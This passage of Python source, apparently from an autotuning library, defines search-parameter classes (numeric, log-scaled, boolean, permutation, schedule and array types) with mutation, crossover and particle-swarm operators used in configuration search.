self.opn_stochastic_mix(cfg, [cfg, cfg1, cfg2], [c, c1, c2])
def opn_stochastic_mix(self, cfg, cfgs, ratio, *args, **kwargs):
"""
Stochastically recombine a list of parent values into a single result.
This randomly copies a value from a list of parents configurations according
to a list of weights.
:param cfg: the configuration to be changed
:param cfgs: a list of parent configurations
:param ratio: a list of floats representing the weight of each configuration
in cfgs
"""
assert len(cfgs) == len(ratio)
r = random.random()
c = numpy.array(ratio, dtype=float) / sum(ratio)
for i in range(len(c)):
if r < sum(c[:i + 1]):
self.copy_value(cfg, cfgs[i])
break
class PrimitiveParameter(Parameter):
"""
An abstract interface implemented by parameters that represent a single
dimension in a cartesian space in a legal range
"""
__metaclass__ = abc.ABCMeta
def __init__(self, name, value_type=float, **kwargs):
self.value_type = value_type
super(PrimitiveParameter, self).__init__(name, **kwargs)
def hash_value(self, config):
"""produce unique hash for this value in the config"""
self.normalize(config)
return hashlib.sha256(repr(self.get_value(config))).hexdigest()
def copy_value(self, src, dst):
"""copy the value of this parameter from src to dst config"""
self.set_value(dst, self.get_value(src))
def same_value(self, cfg1, cfg2):
"""test if cfg1 and cfg2 have the same value of this parameter"""
return self.get_value(cfg1) == self.get_value(cfg2)
def is_integer_type(self):
"""true if self.value_type can only represent integers"""
return self.value_type(0) == self.value_type(0.1)
def get_unit_value(self, config):
"""get_value scaled such that range is between 0.0 and 1.0"""
low, high = self.legal_range(config)
if self.is_integer_type():
# account for rounding
low -= 0.4999
high += 0.4999
val = self.get_value(config)
if low < high:
return float(val - low) / float(high - low)
else:
if low > high:
log.warning('invalid range for parameter %s, %s to %s',
self.name, low, high)
# only a single legal value!
return 0.0
def set_unit_value(self, config, unit_value):
"""set_value scaled such that range is between 0.0 and 1.0"""
assert 0.0 <= unit_value <= 1.0
low, high = self.legal_range(config)
if self.is_integer_type():
# account for rounding
low -= 0.4999
high += 0.4999
if low < high:
val = unit_value * float(high - low) + low
if self.is_integer_type():
val = round(val)
val = max(low, min(val, high))
self.set_value(config, self.value_type(val))
def op1_normal_mutation(self, cfg, sigma=0.1, *args, **kwargs):
"""
apply normally distributed noise to this parameter's value in a
configuration
:param cfg: The configuration to be changed
:param sigma: the std. deviation of the normally distributed noise on a unit
scale
"""
v = self.get_unit_value(cfg)
v += random.normalvariate(0.0, sigma)
# handle boundary cases by reflecting off the edge
if v < 0.0:
v *= -1.0
if v > 1.0:
v = 1.0 - (v % 1)
self.set_unit_value(cfg, v)
def op4_set_linear(self, cfg, cfg_a, cfg_b, cfg_c, a, b, c):
"""
set the parameter value in a configuration to a linear combination of 3
other configurations: :math:`a*cfg_a + b*cfg_b + c*cfg_c`
:param cfg: The configuration to be changed
:param cfg_a: a parent configuration
:param cfg_b: a parent configuration
:param cfg_c: a parent configuration
:param a: weight for cfg_a
:param b: weight for cfg_b
:param c: weight for cfg_c
"""
va = self.get_unit_value(cfg_a)
vb = self.get_unit_value(cfg_b)
vc = self.get_unit_value(cfg_c)
v = a * va + b * vb + c * vc
v = max(0.0, min(v, 1.0))
self.set_unit_value(cfg, v)
def manipulators(self, config):
"""
a list of manipulator functions to change this value in the config
manipulators must be functions that take a config and change it in place
for primitive params default implementation is uniform random and normal
"""
return [self.op1_randomize, self.op1_normal_mutation]
@abc.abstractmethod
def set_value(self, config, value):
"""assign this value in the given configuration"""
pass
@abc.abstractmethod
def get_value(self, config):
"""retrieve this value from the given configuration"""
return 0
@abc.abstractmethod
def legal_range(self, config):
"""return the legal range for this parameter, inclusive"""
return 0, 1
class NumericParameter(PrimitiveParameter):
"""
A parameter representing a number with a minimum and maximum value
"""
def __init__(self, name, min_value, max_value, **kwargs):
"""min/max are inclusive"""
assert min_value <= max_value
super(NumericParameter, self).__init__(name, **kwargs)
# after super call so self.value_type is initialized
self.min_value = self.value_type(min_value)
self.max_value = self.value_type(max_value)
def seed_value(self):
"""some legal value of this parameter (for creating initial configs)"""
return self.min_value
def set_value(self, config, value):
assert value >= self.min_value
assert value <= self.max_value
self._set(config, value)
def get_value(self, config):
return self._get(config)
def legal_range(self, config):
return self.min_value, self.max_value
def op1_randomize(self, config):
"""
Set this parameter's value in a configuration to a random value in its legal
range
:param config: the configuration to be changed
"""
if self.is_integer_type():
self.set_value(config, random.randint(*self.legal_range(config)))
else:
self.set_value(config, random.uniform(*self.legal_range(config)))
def op1_scale(self, cfg, k):
"""
Scale this parameter's value in a configuration by a constant factor
:param cfg: the configuration to be changed
:param k: the constant factor to scale the parameter value by
"""
v = self.get_value(cfg) * k
v = max(self.min_value, min(self.max_value, v))
self.set_value(cfg, v)
def op3_difference(self, cfg, cfg1, cfg2):
"""
Set this parameter's value in a configuration to the difference between this
parameter's values in 2 other configs (cfg2 - cfg1)
:param cfg: the configuration to be changed
:param cfg1: The configuration whose parameter value is being subtracted
:param cfg2: The configuration whose parameter value is subtracted from
"""
v = self.get_value(cfg2) - self.get_value(cfg1)
v = max(self.min_value, min(self.max_value, v))
self.set_value(cfg, v)
def opn_sum(self, cfg, *cfgs):
"""
Set this parameter's value in a configuration to the sum of it's values in a
list of configurations
:param cfg: the configuration to be changed
:param cfgs: a list of configurations to sum
"""
v = sum([self.get_value(c) for c in cfgs])
v = max(self.min_value, min(self.max_value, v))
self.set_value(cfg, v)
def search_space_size(self):
if self.value_type is float:
return 2 ** 32
else:
return self.max_value - self.min_value + 1 # inclusive range
class IntegerParameter(NumericParameter):
"""
A parameter representing an integer value in a legal range
"""
def __init__(self, name, min_value, max_value, **kwargs):
"""min/max are inclusive"""
kwargs['value_type'] = int
super(IntegerParameter, self).__init__(name, min_value, max_value, **kwargs)
def op3_swarm(self, cfg, cfg1, cfg2, c=1, c1=0.5,
c2=0.5, velocity=0, sigma=0.2, *args, **kwargs):
"""
Simulates a single update step in particle swarm optimization by updating
the current position and returning a new velocity.
The new velocity is given by
.. math:: c*velocity + r1*c1*(cfg1-cfg) + r2*c2*(cfg2-cfg)
where r1 and r2 are random values between 0 and 1.
The new current position is the new velocity with gaussian noise added.
:param cfg: the configuration to be changed. Represents the current position
:param cfg1: a configuration to shift towards. Should be the local best
position
:param cfg2: a configuration to shift towards. Should be the global best
position
:param c: the weight of the current velocity
:param c1: weight of cfg1
:param c2: weight of cfg2
:param velocity: the old velocity
:param sigma: standard deviation of the gaussian noise, on a unit-scale
:return: the new velocity, a float
"""
vmin, vmax = self.legal_range(cfg)
k = vmax - vmin
# calculate the new velocity
v = velocity * c + (self.get_value(cfg1) - self.get_value(
cfg)) * c1 * random.random() + (self.get_value(
cfg2) - self.get_value(cfg)) * c2 * random.random()
# Map velocity to continuous space with sigmoid
s = k / (1 + numpy.exp(-v)) + vmin
# Add Gaussian noise
p = random.gauss(s, sigma * k)
# Discretize and bound
p = int(min(vmax, max(round(p), vmin)))
self.set_value(cfg, p)
return v
class FloatParameter(NumericParameter):
def __init__(self, name, min_value, max_value, **kwargs):
"""min/max are inclusive"""
kwargs['value_type'] = float
super(FloatParameter, self).__init__(name, min_value, max_value, **kwargs)
def op3_swarm(self, cfg, cfg1, cfg2, c=1, c1=0.5,
c2=0.5, velocity=0, *args, **kwargs):
"""
Simulates a single update step in particle swarm optimization by updating
the current position and returning a new velocity.
The new velocity is given by
.. math:: c*velocity + r1*c1*(cfg1-cfg) + r2*c2*(cfg2-cfg)
where r1 and r2 are random values between 0 and 1
The new current position is the old current position offset by the new
velocity:
:param cfg: the configuration to be changed. Represents the current position
:param cfg1: a configuration to shift towards. Should be the local best
position
:param cfg2: a configuration to shift towards. Should be the global best
position
:param c: the weight of the current velocity
:param c1: weight of cfg1
:param c2: weight of cfg2
:param velocity: the old velocity
:return: the new velocity, a float
"""
vmin, vmax = self.legal_range(cfg)
v = velocity * c + (self.get_value(cfg1) - self.get_value(
cfg)) * c1 * random.random() + (self.get_value(
cfg2) - self.get_value(cfg)) * c2 * random.random()
p = self.get_value(cfg) + v
p = min(vmax, max(p, vmin))
self.set_value(cfg, p)
return v
class ScaledNumericParameter(NumericParameter):
"""
A Parameter that is stored in configurations normally, but has a scaled
value when accessed using 'get_value'.
Because search techniques interact with Parameters through get_value, these
parameters are searched on a different scale (e.g. log scale).
"""
@abc.abstractmethod
def _scale(self, v):
"""
called on a value when getting it from it's configuration. Transforms the
actual value to the scale it is searched on
"""
return v
@abc.abstractmethod
def _unscale(self, v):
"""
called on a value when storing it. Transforms a value from it's search scale
to it's actual value
"""
return v
def set_value(self, config, value):
NumericParameter.set_value(self, config, self._unscale(value))
def get_value(self, config):
return self._scale(NumericParameter.get_value(self, config))
def legal_range(self, config):
return map(self._scale, NumericParameter.legal_range(self, config))
class LogIntegerParameter(ScaledNumericParameter, FloatParameter):
"""
an integer value that is searched on a log scale, but stored without scaling
"""
def _scale(self, v):
return math.log(v + 1.0 - self.min_value, 2.0)
def _unscale(self, v):
v = 2.0 ** v - 1.0 + self.min_value
v = int(round(v))
return v
def legal_range(self, config):
low, high = NumericParameter.legal_range(self, config)
# increase the bounds account for rounding
return self._scale(low - 0.4999), self._scale(high + 0.4999)
class LogFloatParameter(ScaledNumericParameter, FloatParameter):
"""
a float parameter that is searched on a log scale, but stored without scaling
"""
def _scale(self, v):
return math.log(v + 1.0 - self.min_value, 2.0)
def _unscale(self, v):
v = 2.0 ** v - 1.0 + self.min_value
return v
class PowerOfTwoParameter(ScaledNumericParameter, IntegerParameter):
"""
An integer power of two, with a min and max value. Searched by the exponent
"""
def __init__(self, name, min_value, max_value, **kwargs):
kwargs['value_type'] = int
assert min_value >= 1
assert math.log(min_value, 2) % 1 == 0 # must be power of 2
assert math.log(max_value, 2) % 1 == 0 # must be power of 2
super(PowerOfTwoParameter, self).__init__(name, min_value, max_value,
**kwargs)
def _scale(self, v):
return int(math.log(v, 2))
def _unscale(self, v):
return 2 ** int(v)
def legal_range(self, config):
return int(math.log(self.min_value, 2)), int(math.log(self.max_value, 2))
def search_space_size(self):
return int(math.log(super(PowerOfTwoParameter, self).search_space_size(), 2))
##################
class ComplexParameter(Parameter):
"""
A non-cartesian parameter that can't be manipulated directly, but has a set
of user defined manipulation functions
"""
def copy_value(self, src, dst):
"""copy the value of this parameter from src to dst config"""
self._set(dst, copy.deepcopy(self._get(src)))
def same_value(self, cfg1, cfg2):
"""test if cfg1 and cfg2 have the same value of this parameter"""
return self._get(cfg1) == self._get(cfg2)
def hash_value(self, config):
"""produce unique hash for this value in the config"""
self.normalize(config)
return hashlib.sha256(repr(self._get(config))).hexdigest()
def get_value(self, config):
return self._get(config)
def set_value(self, config, value):
self._set(config, value)
def op4_set_linear(self, cfg, cfg_a, cfg_b, cfg_c, a, b, c):
"""
set this value to :math:`a*cfg_a + b*cfg_b + c*cfg_c`
this operation is not possible in general with complex parameters but
we make an attempt to "fake" it for common use cases
basically a call to randomize unless after normalization,
a = 1.0, b == -c, and cfg_b == cfg_c, in which case nothing is done
:param cfg: the configuration to be changed
:param cfg_a: a parent configuration
:param cfg_b: a parent configuration
:param cfg_c: a parent configuration
:param a: weight for cfg_a
:param b: weight for cfg_b
:param c: weight for cfg_c
"""
# attempt to normalize order, we prefer a==1.0
if a != 1.0 and b == 1.0: # swap a and b
a, cfg_a, b, cfg_b = b, cfg_b, a, cfg_a
if a != 1.0 and c == 1.0: # swap a and c
a, cfg_a, c, cfg_c = c, cfg_c, a, cfg_a
# attempt to normalize order, we prefer b==-c
if b < c: # swap b and c
b, cfg_b, c, cfg_c = c, cfg_c, b, cfg_b
if b != -c and a == -c: # swap a and c
a, cfg_a, c, cfg_c = c, cfg_c, a, cfg_a
if a == 1.0 and b == -c:
self.copy_value(cfg_a, cfg)
self.add_difference(cfg, b, cfg_b, cfg_c) # TODO inline this logic?
else:
# TODO: should handle more cases
self.op1_randomize(cfg)
def add_difference(self, cfg_dst, scale, cfg_b, cfg_c):
"""
add the difference cfg_b-cfg_c to cfg_dst
this is the key operation used in differential evolution
and some simplex techniques
this operation is not possible in general with complex parameters but
we make an attempt to "fake" it
"""
if not self.same_value(cfg_b, cfg_c):
self.op1_randomize(cfg_dst)
@abc.abstractmethod
def op1_randomize(self, config):
"""
randomize this value without taking into account the current position
:param config: the configuration to be changed
"""
pass
@abc.abstractmethod
def seed_value(self):
"""some legal value of this parameter (for creating initial configs)"""
return
class BooleanParameter(ComplexParameter):
def manipulators(self, config):
return [self.op1_flip]
def get_value(self, config):
return self._get(config)
def set_value(self, config, value):
self._set(config, value)
def op1_randomize(self, config):
"""
Set this parameter's value in a configuration randomly
:param config: the configuration to be changed
"""
self._set(config, self.seed_value())
def seed_value(self):
return random.choice((True, False))
def op1_flip(self, config):
"""
Flip this parameter's value in a configuration
:param config: the configuration to be changed
"""
self._set(config, not self._get(config))
def search_space_size(self):
return 2
def op3_swarm(self, cfg, cfg1, cfg2, c=1, c1=0.5,
c2=0.5, velocity=0, *args, **kwargs):
"""
Simulates a single update step in particle swarm optimization by updating
the current position and returning a new velocity.
The new velocity is given by
.. math:: c*velocity + r1*c1*(cfg1-cfg) + r2*c2*(cfg2-cfg)
where r1 and r2 are random values between 0 and 1
The new current position is randomly chosen based on the new velocity
:param cfg: the configuration to be changed. Represents the current position
:param cfg1: a configuration to shift towards. Should be the local best position
:param cfg2: a configuration to shift towards. Should be the global best position
:param c: the weight of the current velocity
:param c1: weight of cfg1
:param c2: weight of cfg2
:param velocity: the old velocity
:param args:
:param kwargs:
:return: the new velocity, a float
"""
v = velocity * c + (self.get_value(cfg1) - self.get_value(
cfg)) * c1 * random.random() + (self.get_value(
cfg2) - self.get_value(cfg)) * c2 * random.random()
# Map velocity to continuous space with sigmoid
s = 1 / (1 + numpy.exp(-v))
# Decide position randomly
p = (s - random.random()) > 0
self.set_value(cfg, p)
return v
class SwitchParameter(ComplexParameter):
"""
A parameter representing an unordered collection of options with no implied
correlation between the choices. The choices are range(option_count)
"""
def __init__(self, name, option_count):
self.option_count = option_count
super(SwitchParameter, self).__init__(name)
def op1_randomize(self, config):
"""
Set this parameter's value in a configuration to a random value
:param config: the configuration to be changed
"""
self._set(config, random.randrange(self.option_count))
def seed_value(self):
return random.randrange(self.option_count)
def search_space_size(self):
return max(1, self.option_count)
class EnumParameter(ComplexParameter):
"""
same as a SwitchParameter but choices are taken from an arbitrarily typed list
"""
def __init__(self, name, options):
super(EnumParameter, self).__init__(name)
self.options = list(options)
def op1_randomize(self, config):
"""
Set this parameter's value in a configuration to a random value
:param config: the configuration to be changed
"""
self._set(config, random.choice(self.options))
def seed_value(self):
return random.choice(self.options)
def search_space_size(self):
return max(1, len(self.options))
class PermutationParameter(ComplexParameter):
"""
A parameter representing a permutation (or ordering) as a list of items
"""
def __init__(self, name, items):
super(PermutationParameter, self).__init__(name)
self._items = list(items)
self.size = len(items)
def op1_randomize(self, config):
"""
Set this parameter's value in a configuration to a random value
:param config: the configuration to be changed
"""
random.shuffle(self._get(config))
self.normalize(config)
def op1_small_random_change(self, config, p=0.25):
"""
Iterates through the list and probabilistically swaps each element with the
next element
:param p: probability of swapping an element with the next element
:param config: the configuration to be changed
"""
cfg_item = self._get(config)
for i in xrange(1, len(cfg_item)):
if random.random() < p:
# swap
cfg_item[i - 1], cfg_item[i] = cfg_item[i], cfg_item[i - 1]
self.normalize(config)
def seed_value(self):
return list(self._items) # copy
def manipulators(self, config):
return [self.op1_randomize, self.op1_small_random_change]
def get_value(self, config):
return self._get(config)
def set_value(self, config, value):
self._set(config, value)
def search_space_size(self):
return math.factorial(max(1, len(self._items)))
def op3_cross(self, cfg, cfg1, cfg2, xchoice='op3_cross_OX1', strength=0.3,
*args, **kwargs):
"""
Calls the crossover operator specified by xchoice
Passes argument d = strength*(size of the permutation)
:param cfg: the configuration to be changed
:param cfg1: a parent configuration
:param cfg2: a parent configuration
:param xchoice: string specifying which crossover operator to use (should start with op3_cross prefix)
:param strength: the strength of the crossover
"""
dd = int(round(self.size * strength))
if dd < 1:
log.warning('Crossover length too small. Cannot create new solution.')
if dd >= self.size:
log.warning('Crossover length too big. Cannot create new solution.')
getattr(self, xchoice)(cfg, cfg1, cfg2, d=dd, *args, **kwargs)
def op3_swarm(self, cfg, cfg1, cfg2, xchoice='op3_cross_OX1', c=0.5,
c1=0.5, c2=0.5, strength=0.3, velocity=0, *args, **kwargs):
"""
Replacement for particle swarm optimization iterative step for permutations.
Given a target cfg and 2 parent cfgs, probabilistically performs an
op3_cross with one of the 2 parents.
:param cfg: the configuration to be changed. Represents the current position
:param cfg1: a configuration to shift towards. Should be the local best
position
:param cfg2: a configuration to shift towards. Should be the global best
position
:param xchoice: which crossover operator should be used
:param c: the probability of not performing a crossover
:param c1: the probability of performing a crossover with cfg1 (if a
crossover is performed)
:param c2: unused
:param strength: the strength of the crossover
:param velocity: the old velocity - unused
"""
if random.uniform(0, 1) > c:
if random.uniform(0, 1) < c1:
# Select crossover operator
self.op3_cross(cfg, cfg, cfg1, xchoice, strength)
else:
self.op3_cross(cfg, cfg, cfg2, xchoice, strength)
# swap-based operators
def op2_random_swap(self, cfg, cfg1, *args, **kwargs):
"""
Swap a random pair of items in cfg1 and save the result into cfg
:param cfg: the configuration to be changed
:param cfg1: the configuration whose PermutationParameter's elements are
swapped and copied into cfg
"""
p = self.get_value(cfg1)[:]
r = random.randint(0, len(p) - 1)
s = random.randint(0, len(p) - 1)
v1 = p[r]
v2 = p[s]
p[r] = v2
p[s] = v1
self.set_value(cfg, p)
def op2_random_invert(self, cfg, cfg1, strength=0.3, *args, **kwargs):
"""
Reverse the ordering of a random subsection of size d in cfg1 and save the
result in cfg where d = strength*total-size
:param cfg: the configuration to be changed
:param cfg1: the configuration whose PermutationParameter is inverted
:param strength: the size of the reversed subsection as a fraction of the
total size
"""
p = self.get_value(cfg1)[:]
d = int(round(len(p) * strength))
r = random.randint(0, len(p) - d)
subpath = p[r:r + d][:]
subpath.reverse()
p[r:r + d] = subpath
self.set_value(cfg, p)
# Crossover operators
def op3_cross_PX(self, cfg, cfg1, cfg2, d=0):
"""
Partition crossover (Whitley 2009?)
Chooses a random cut point and reorders elements in cfg1 up to the cut point
according to their order in cfg2.
Saves the result in cfg
:param cfg: the configuration to be changed
:param cfg1: the first parent configuration. The "base" configuration
:param cfg2: the second parent configuration. Is "crossed into" cfg1
:param d: unused
"""
p1 = self.get_value(cfg1)
p2 = self.get_value(cfg2)
c1 = random.randint(2, len(p1))
self.set_value(cfg, sorted(p1[:c1], key=lambda x: p2.index(x)) + p1[c1:])
def op3_cross_PMX(self, cfg, cfg1, cfg2, d=0):
"""
Partially-mapped crossover Goldberg & Lingle (1985)
Replaces a random section of cfg1 with the corresponding section in cfg2.
Displaced elements in cfg1 are moved to the old position of the elements
displacing them
:param cfg: the configuration to be changed
:param cfg1: the first parent configuration. The "base" configuration
:param cfg2: the second parent configuration. Is "crossed into" cfg1
:param d: the size of the crossover
"""
if d == 0:
d = max(1, int(round(self.size * 0.3))) # default to 1/3 of permutation size
p1 = self.get_value(cfg1)[:]
p2 = self.get_value(cfg2)[:]
r = random.randint(0, len(p1) - d)
c1 = p1[r:r + d]
c2 = p2[r:r + d]
# get new permutation by crossing over a section of p2 onto p1
pnew = self.get_value(cfg1)[:]
pnew[r:r + d] = c2
# fix conflicts by taking displaced elements in crossed over section
# displaced = (elements x in c1 where x does not have corresponding value in c2)
# and putting them where the value that displaced them was
#candidates for displacement
candidate_indices = set(range(r) + range(r+d, len(p1)))
# Check through displaced elements to find values to swap conflicts to
while c1 != []:
n = c1[0]
#try to match up a value in c1 to the equivalent value in c2
while c2[0] in c1:
if n == c2[0]:
# already match up
break
# find position idx of c2[0] in c1
link_idx = c1.index(c2[0])
# get value of c2 at idx
link = c2[link_idx]
# remove c2[idx] and c1[idx] since they match up when we swap c2[0] with c2[idx] (this avoids an infinite loop)
del c2[link_idx]
del c1[link_idx]
# swap new value into c2[0]
c2[0] = link
if n != c2[0]:
# first check if we can swap in the crossed over section still
if n in c2:
c2[c2.index(n)] = c2[0]
else:
# assign first instance of c2[0] outside of the crossed over section in pnew to c1[0]
for idx in candidate_indices:
if pnew[idx] == c2[0]:
pnew[idx] = c1[0]
candidate_indices.remove(idx) # make sure we don't override this value now
break
# remove first elements
del c1[0]
del c2[0]
self.set_value(cfg, pnew)
def op3_cross_CX(self, cfg, cfg1, cfg2, d=0):
"""
Implementation of a cyclic crossover.
Repeatedly replaces elements of cfg1 with the element at the same index in
cfg2. This is done until a cycle is reached and cfg1 is valid again. The
initial replacement is random.
Saves the result in cfg.
:param cfg: the configuration to be changed
:param cfg1: the first parent configuration. The "base" configuration
:param cfg2: the second parent configuration. Is "crossed into" cfg1
:param d: unused
"""
p1 = self.get_value(cfg1)
p2 = self.get_value(cfg2)
p = p1[:]
s = random.randint(0, len(p1) - 1)
i = s
indices = set()
while len(indices) < len(p1): # should never exceed this
indices.add(i)
val = p1[i]
i = p2.index(val)
# deal with duplicate values
while i in indices:
if i == s:
break
i = p2[i+1:].index(val) + i + 1
if i == s:
break
for j in indices:
p[j] = p2[j]
self.set_value(cfg, p)
def op3_cross_OX1(self, cfg, cfg1, cfg2, d=0):
"""
Ordered Crossover (Davis 1985)
Exchanges a subpath from cfg2 into cfg1 while maintaining the order of the
remaining elements in cfg1.
Saves the result in cfg.
:param cfg: the configuration to be changed
:param cfg1: the first parent configuration. The "base" configuration
:param cfg2: the second parent configuration. Is "crossed into" cfg1
:param d: size of the exchanged subpath
"""
if d == 0:
d = max(1, int(round(self.size * 0.3))) # default to 1/3 of permutation size
p1 = self.get_value(cfg1)
p2 = self.get_value(cfg2)
c1 = p1[:]
c2 = p2[:]
# Randomly find cut points
r = random.randint(0, len(
p1) - d) # Todo: treat path as circle i.e. allow cross-boundary cuts
[c1.remove(i) for i in p2[r:int(r + d)]]
self.set_value(cfg, c1[:r] + p2[r:r + d] + c1[r:])
def op3_cross_OX3(self, cfg, cfg1, cfg2, d=0):
"""
Ordered crossover variation 3 (Deep 2010)
Same as op3_cross_OX1, except the parents have different cut points for
their subpaths
:param cfg: the configuration to be changed
:param cfg1: the first parent configuration. The "base" configuration
:param cfg2: the second parent configuration. Is "crossed into" cfg1
:param d: size of the exchanged subpath
"""
if d == 0:
d = max(1, int(round(self.size * 0.3))) # default to 1/3 of permutation size
p1 = self.get_value(cfg1)
p2 = self.get_value(cfg2)
c1 = p1[:]
c2 = p2[:]
# Randomly find cut points
# Todo: treat path as circle i.e. allow cross-boundary cuts
r1 = random.randint(0, len(p1) - d)
r2 = random.randint(0, len(p1) - d)
[c1.remove(i) for i in p2[r2:r2 + d]]
self.set_value(cfg, c1[:r1] + p2[r2:r2 + d] + c1[r1:])
def search_space_size(self):
return math.factorial(max(1, len(self._items)))
class ScheduleParameter(PermutationParameter):
def __init__(self, name, items, deps):
super(ScheduleParameter, self).__init__(name, items)
self.deps = dict((k, set(v)) for k, v in deps.items())
log.debug("ScheduleParameter(%s, %s, %s)", repr(name), repr(items),
repr(deps))
self._expand_deps()
def _expand_deps(self):
"""expand self.deps to include recursive dependencies"""
fixed_point = False
while not fixed_point:
fixed_point = True
for k in self.deps.keys():
oldlen = len(self.deps[k])
for dep in list(self.deps[k]):
if dep in self.deps:
self.deps[k].update(self.deps[dep])
if oldlen != len(self.deps[k]):
fixed_point = False
# verify schedule is valid
items = set(self._items)
for k, v in self.deps.items():
if k in v:
raise Exception("ScheduleParameter('%s') cycle: %s depends on itself" %
(self.name, k))
if v - items:
raise Exception("ScheduleParameter('%s'): %s is unknown" %
(self.name, v - items))
if set(self.deps.keys()) - items:
raise Exception("ScheduleParameter('%s'): %s is unknown" %
(self.name, set(self.deps.keys()) - items))
def is_topologically_sorted(self, values):
used = set()
for v in values:
if v in self.deps and self.deps[v].union(used):
return False
used.add(v)
return True
def topologically_sorted_depth_first(self, values):
"""faster but not stable enough"""
if self.is_topologically_sorted(values):
return values
sorted_values = []
used = set()
deps = dict((k, sorted(v, key=values.index, reverse=True))
for k, v in self.deps.items())
def visit(v):
if v in used:
return
if v in deps:
for dv in deps[v]:
visit(dv)
used.add(v)
sorted_values.append(v)
for v in reversed(values):
visit(v)
return list(reversed(sorted_values))
def topologically_sorted(self, values):
if self.is_topologically_sorted(values):
return values
deps = copy.deepcopy(self.deps)
queue = collections.deque(reversed(values))
sorted_values = []
while queue:
v = queue.popleft()
if v in deps and deps[v]:
queue.append(v)
else:
for k, d in deps.items():
d.discard(v)
if not d:
del deps[k]
sorted_values.append(v)
return list(reversed(sorted_values))
def normalize(self, cfg):
self._set(cfg, self.topologically_sorted(self._get(cfg)))
class SelectorParameter(ComplexParameter):
def __init__(self, name, choices, max_cutoff,
order_class=PermutationParameter,
offset_class=LogIntegerParameter):
super(SelectorParameter, self).__init__(name)
self.choices = choices
self.max_cutoff = max_cutoff
self.order_param = order_class('{0}/order'.format(name), choices)
self.offset_params = [
offset_class('{0}/offsets/{1}'.format(name, i), 0, max_cutoff)
for i in xrange(len(choices) - 1)]
def sub_parameters(self):
return [self.order_param] + self.offset_params
def seed_value(self):
return {'order': self.order_param.seed_value(),
'offsets': [co.seed_value() for co in self.offset_params]}
def op1_randomize(self, config):
random.choice(self.sub_parameters()).op1_randomize(config)
def selector_iter(self, config):
"""
yield (cutoff, choice) pairs
cutoff will be None on the first value
"""
order = config[self.name]['order']
yield (None, order[0])
cutoff = 0
for n, offset in enumerate(config[self.name]['offsets']):
if offset > 0:
cutoff += offset
yield cutoff, order[n + 1]
class ParameterArray(ComplexParameter):
"""
Represents an array of Parameters
"""
def __init__(self, name, count, element_type, *args, **kwargs):
super(ParameterArray, self).__init__(name)
self.count = count
self.sub_params = [
element_type('{0}/{1}'.format(name, i), *args[i], **kwargs[i])
for i in xrange(count)]
def sub_parameters(self):
return self.sub_params
def seed_value(self):
return [p.seed_value() for p in self.sub_params]
def op1_randomize(self, config):
"""
randomly selects a sub-parameter and randomizes it
:param config: the configuration to be changed
"""
random.choice(self.sub_parameters()).op1_randomize(config)
class BooleanParameterArray(ParameterArray):
"""
Represents an array of BooleanParameters - currently unimplimented
"""
def __init__(self, name, count):
super(BooleanParameterArray, self).__init__(name, count, BooleanParameter)
def op3_swarm(self, cfg, cfg1, cfg2, *args, **kwargs):
# TODO
pass
def op3_cross(self, cfg, cfg1, cfg2, *args, **kwargs):
# TODO
pass
class IntegerParameterArray(ParameterArray):
"""
Represents an array of IntegerParameters - currently unimplemented
"""
def __init__(self, name, min_values, max_values):
assert len(min_values) == len(max_values)
super(IntegerParameterArray, self).__init__(name, len(min_values),
IntegerParameter,
min_value=min_values,
max_value=max_values)
def op3_swarm(self, cfg, cfg1, cfg2, *args, **kwargs):
# TODO
pass
def op3_cross(self, cfg, cfg1, cfg2, *args, **kwargs):
# TODO
pass
class Array(ComplexParameter):
"""
An interface for parameters representing an array of values.
"""
# TODO: constraints? (upper & lower bound etc)
def __init__(self, name, size):
super(Array, self).__init__(name)
self.size = size
def op3_cross(self, cfg, cfg1, cfg2, strength=0.3, *args, **kwargs):
"""
Crosses two arrays by replacing a random subsection of cfg1 with the
corresponding subsection of cfg2.The size of the chunk is a fixed fraction
of the total length, given by the strength
Behaves like a specialized 2-point crossover, where the first cut point is
random and the second cut is a set distance after.
:param cfg: the configuration to be changed
:param cfg1: the configuration being inserted into
:param cfg2: the configuration being inserted
:param strength: the size of the crossover, as a fraction of total array
length
"""
d = int(round(self.size * strength))
if d < 1:
log.debug('Crossover length too small. Cannot create new solution.')
if d >= self.size:
log.debug('Crossover length too big. Cannot create new solution.')
p1 = self.get_value(cfg1)
p2 = self.get_value(cfg2)
r = random.randint(0, len(
p1) - d) # Todo: treat path as circle i.e. allow cross-boundary cuts
p = numpy.concatenate([p1[:r], p2[r:r + d], p1[r + d:]])
self.set_value(cfg, p)
def op3_swarm(self, cfg, cfg1, cfg2, c=1, c1=0.5,
c2=0.5, velocity=0, strength=0.3, *args, **kwargs):
"""
Replacement for a particle swarm optimization iterative step for arrays.
Given a target cfg and 2 parent cfgs, probabilistically performs an
:py:meth:`op3_cross` with one of the 2 parents.
:param cfg: the configuration to be changed. Represents the cfg position
:param cfg1: a configuration to shift towards. Should be the local best
position
:param cfg2: a configuration to shift towards. Should be the global best
position
:param c: the probability of not performing a crossover
:param c1: the probability of performing a crossover with cfg1 (if a
crossover is performed)
:param c2: unused
:param velocity: the old velocity - unused
:param strength: the strength of the crossover
"""
if random.uniform(0, 1) > c:
if random.uniform(0, 1) < c1:
# Select crossover operator
self.op3_cross(cfg, cfg, cfg1, strength)
else:
self.op3_cross(cfg, cfg, cfg2, strength)
def get_value(self, config):
return self._get(config)
def set_value(self, config, value):
self._set(config, value)
class BooleanArray(Array):
"""
Represents an array of boolean values which are either 0 or 1
"""
def op3_swarm_parallel(self, cfg, cfg1, cfg2, c=1,
c1=0.5, c2=0.5, velocities=0):
"""
Simulates a single particle swarm optimization step for each element in the
array by updating each position and returning an array of new velocities.
The new velocities are given by
.. math:: c*velocity + r1*c1*(cfg1-cfg) + r2*c2*(cfg2-cfg)
where r1 and r2 are random values between 0 and 1. In each iteration, r1 and
r2 are constant across array elements
The new cfg positions are randomly chosen based on the new velocities
:param cfg: the configuration to be changed. This represents the current
position
:param cfg1: a configuration to shift towards. Should be the local best
position
:param cfg2: a configuration to shift towards. Should be the global best
position
:param c: the weight of the current velocities
:param c1: weight of cfg1
:param c2: weight of cfg2
:param velocities: the current velocities
:return: a numpy array of new velocities
"""
vs = velocities * c + (self.get_value(cfg1) - self.get_value(
cfg)) * c1 * random.random() + (self.get_value(
cfg2) - self.get_value(cfg)) * c2 * random.random()
# Map velocity to continuous space with sigmoid
ss = 1 / (1 + numpy.exp(-vs))
# Decide position randomly
ps = (ss - numpy.random.rand(1, self.size)) > 0
self.set_value(cfg, ps)
return vs
def op1_randomize(self, config):
"""
Set this parameter's value in a configuration randomly
:param config: the configuration to be changed
